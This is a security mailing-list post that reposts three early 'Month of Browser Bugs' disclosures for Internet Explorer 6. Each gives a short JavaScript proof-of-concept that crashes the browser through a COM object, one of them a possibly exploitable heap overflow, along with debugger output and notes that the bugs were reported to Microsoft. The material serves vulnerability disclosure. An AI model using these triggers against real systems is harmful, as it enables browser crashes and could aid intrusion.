Re: H D Moore opened Browser Fun Blog

["Dude VanWinkle" <dudevanwinkle () gmail com>]

Here are the first three FYI:

MoBB #1: ADODB.Recordset Filter Property

The following bug was tested on the latest version of Internet
Explorer 6 on a fully-patched Windows XP SP2 system. The interesting
thing about this bug is how the same property has to be set three
different times to trigger the exception.

a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }

Demonstration

eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE ADODB.Recordset COM Object Filter Property NULL Dereference.

posted by hdm @ 11:27 PM   2 comments links to this post
MoBB #2: Internet.HHCtrl Image Property

The following bug was tested on the latest version of Internet
Explorer 6 on a fully-patched Windows XP SP2 system. This bug is
interesting because a small heap overflow occurs each time this
property is set. The bug is difficult to detect unless heap
verification has been enabled in the global debug flags for
iexplore.exe. The demonstration below results in a possibly
exploitable heap corruption after 128 or more iterations of the
property set.

var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;

for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}

Demonstration

eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??

This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE HTML Help COM Object Image Property Heap Overflow.

posted by hdm @ 9:11 AM   3 comments links to this post


MoBB #3: OutlookExpress.AddressBook

The following bug was tested on the latest version of Internet
Explorer 6 on a fully-patched Windows 2000 SP4 system. It appears to
have been resolved (via killbit) in a recent update to Window XP SP2.
This bug is one of many that are triggered by loading a non-ActiveX
COM object from inside Internet Explorer.

a = new ActiveXControl('OutlookExpress.AddressBook');

Demonstration

eax=00000000 ebx=06622008 ecx=00000002
edx=065814e4 esi=00000000 edi=00000000
eip=0648b2f5 esp=0012a734 ebp=0012a754
msoe!IDwGetOption+0x78:
0648b2f5 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE OutlookExpress.AddressBook COM Object NULL Dereference.
_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.